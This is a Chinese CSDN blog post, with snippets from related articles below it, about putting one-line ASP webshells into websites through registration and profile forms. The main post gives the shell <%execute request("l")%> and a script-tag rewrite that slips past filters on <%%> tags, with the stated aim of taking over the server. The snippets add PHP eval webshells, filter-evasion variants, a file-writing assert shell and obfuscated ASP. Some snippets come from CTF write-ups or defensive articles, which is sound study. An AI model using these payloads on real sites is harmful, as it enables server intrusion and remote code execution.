一句话木马中突破〈%%〉标记过滤

最新推荐文章于 2024-07-06 18:34:40 发布
最新推荐文章于 2024-07-06 18:34:40 发布
阅读量823 收藏
点赞数
文章标签: asp 数据库 服务器 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HackCode/article/details/2716835
版权
 很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。

使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。

不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。

这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是“<%execute request("l")%>", 我们可以把它的标签换下来。

然后改成"<scriptlanguage=VBScript runat=server>execute request("l")</Script>".。

这样就避开了使用〈%%〉,保存为.ASP,程序照样执行,效果是一样的。
HackCode
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
上传一句话木马时<? php被过滤的解决办法
ancan8807的博客
09-15 3012
i春秋“百度杯”CTF比赛 九月场 web题 upload 题目描述:想怎么传就怎么传,就是这么任性。tips:flag在flag.php 打开题目发现 于是想到通过上传一句话木马进入后台 上传一句话木马 <?phpeval($_POST['ant']);?> 提示上传成功,查看网页源代码提示 php文件上传到u/antsword.php...
web安全的一句话木马
IerkeU的博客
12-13 2282
一、WEBshell Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与
〈%# 〉与〈%= 〉的区别,显示数据与绑定数据
灵雨飘零的专栏
01-11 5167
有很长时间没来 CSDN 的博客了。今天在社区里看到一个网友提问关于 asp.net “” 的问题,所以还是想把这篇文章发到自己的博客上。虽然不是非常很高深的问题,但是还是应该多加留意……aspx页面, 与 的区别关于这个问题,在多数的 ASP.NET 的教材,都提到了一些。与的区别在于:绑定时机不同,是在控件调用DataBind函数的时候才被确定。对于,我想你应该不会陌生,在ASP
[SWPUCTF 2021 新生赛]easyupload2.0(前端后缀过滤不完整+一句话木马+蚁剑)
2401_84499442的博客
07-06 189
看这里的upload1.jpg,首先我想到先用php配置文件修改jpg文件的属性,让服务器能够解析执行jpg文件.php行不通,那就继续换,经过实验,发现phtml和phtm没有过滤干净。后面的1.phtml是你上传的文件,然后找到flag.php。哦,忘了,这里的一句话木马密码是a,之前忘记说了。首先看标签,明确方向,这是一个文件上传的题目。
如何绕过防止注入的链接
CTO成长之路——Rosanu
04-18 1458
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“'”号和 “=”号过滤突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……  经过我的收集,大部分的防注入程序都过滤了以下关键字:  and | select | update | chr |
一句话木马及几种可绕过过滤格式
收集盒 Book box
04-12 3806
<br /><br />ASP一句话<br /> <br />1.<%eval request("YouPass")%><br /> <br />2. <%executerequest("YouPass")%><br /> <br />3. <%execute(request("YouPass"))%><br /> <br />免杀大部分网站的一句话<br /> <br />4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1"
php一句话图片木马过滤_php一句话木马和图片木马的运行方法
weixin_31485835的博客
03-08 2252
标准的写法,直接通过eval执行php代码,如下:@eval($_POST['code']);动态执行assert生成一个木马文件(隐藏性最好的一种)如下:@$_GET['a']($_GET['code']);使用方法:从url传入下面参数执行后会在当前目录生成一个c.php的文件.如下:/index.php?a=assert&code=${fputs%28fopen%28base64...
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
基于 python 实现的千倍速一句话木马密码爆破工具
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
php一句话cmdshell新型 (非一句话木马)
10-30
【PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
php输入框怎么过滤%号,php关于输入过滤小结
weixin_35500243的博客
03-10 375
Web的攻击,大部分是来自于外部,如Url上添加一些字段注入($_GET输入),表单的提交注入(一般为$_POST),所以在接收数据时对数据进行过滤,是很有必要的。一. 一般php自过滤方法有:1.空过滤trim过滤字符串首尾空格$name=trim($_POST['name']);2.标签过滤 :strip_tags会将字符串的php标签()Html标签(....等)移除。一定程序上...
一句话木马绕WAF(小宇特详解)
小宇的web博客
04-08 2567
webshell绕过WAF 常见的PHP一句话木马就是 <?php eval($_REQUEST['a'];)?> WAF的工作原理以正则匹配为主,这里尝试他到底是正则匹配了什么 这里首先尝试 <?php eval?> 发现没有拦截 然后尝试 <?php eval($_REQUEST[]);?> 发现拦截了,去掉括号,发现不拦截了。 这里过滤了[] =>替换eval 替换$_REQUEST[a]=>超全局变量 这里利用了一个php函数end end函
<%%>用法初步认识
weixin_30390075的博客
12-16 438
<%%>是用于向客户端插入服务器代码所使用的一种标记 例如为了在HTML页面上展示由服务器提供的当前用户的某条信息或名字等便可使用 前台 <a href="home.aspx"><%=Name()%>的个人主页</a> 后台 public string Name() { try {...
php一句话图片木马过滤_php一句话图片木马怎么解析
weixin_34580002的博客
03-08 1721
一句话木马解析首先,学习渗透时,木马大概也就三种:大马、小马、一句话。常见的一句话:这个应该是最常见的了...看一下他的组成.首先是一个eval函数,其次是post提交一个参数为x的值.首先我们看看eval函数是干什么的。官方说明:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串调用 return 语句,则返回 NUL...
Web安全-一句话木马
jennycisp的博客
12-25 3724
在很多的渗透过程,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》?基本原理】利用文件上传漏洞,往目标网站上传一句话木马,然后你就可以在本地通过国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。表示从页面获得attack这个参数值。
ASP.NET 〈%# 〉与〈%=〉的区别
weixin_38166557的博客
07-17 250
0、<%= %>是输出,<%# %>是赋值! 绑定时机不同,<%# %>是在控件调用DataBind函数的时候才被确定。对于<%= %>,我想你应该不会陌生,在ASP时代,它就相当于 Response.Write。在ASP.NET时代也一样。 1、<%=%> 里面放的变量名,如: <div> < h1>...
一句话木马及免杀
热门推荐
Lum1n0us's Blog
08-12 1万+
这篇文章主要是总结一句话木马,并实现一句话木马的简单免杀,以及一个不死马的实现。 文章目录一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马不死马 一句话木马及原理 首先,来看最简单的一句话木马: <?php @eval($_POST['cmd']); ?> 前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_PO
怎么查找一句话木马文件名及内容在Wireshark
最新发布
07-09
在Wireshark查找特定的木马文件名及其内容通常涉及到网络抓包分析。Wireshark是一款强大的网络协议分析工具,可以帮助你查看和理解计算机之间的通信。以下是步骤: 1. **启动Wireshark**:首先,你需要捕获数据包。打开Wireshark,选择合适的网络接口(如eth0、Wi-Fi等),然后开始捕获。 2. **过滤数据包**:在顶部菜单栏选择“过滤”>“显示过滤器”,输入相关的关键词。例如,如果你怀疑木马文件名为"trojan.exe",你可以添加过滤条件`tcp.port == 80 and host -eq your_ip_address and "trojan.exe"`(假设木马通过HTTP传输)。这将显示包含指定字符串的所有TCP连接到特定IP地址的请求。 3. **查看上下文**:对于每个匹配的包,点击它以查看详细信息。在这里,你可能会看到文件名部分以及与其关联的数据内容。注意,木马文件内容可能已被加密或进行了编码,需要一定的技术知识去解码。 4. **检查HTTP头和正文**:如果木马是作为HTTP请求的一部分发送的,查看`http.request.body`字段可以找到可能的内容。同样,对于HTTPS,你会在`tls.record.content`找到明文数据。 5. **搜索附件**:有些恶意软件会作为电子邮件或下载附件传播。检查SMTP(邮件)或者FTP(文件传输)相关的数据流,看是否有可疑的附件存在。 6. **确认与分析**:最后,确认发现的信息是否可信,并结合其他安全手段和技术进行进一步分析,以防误报。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值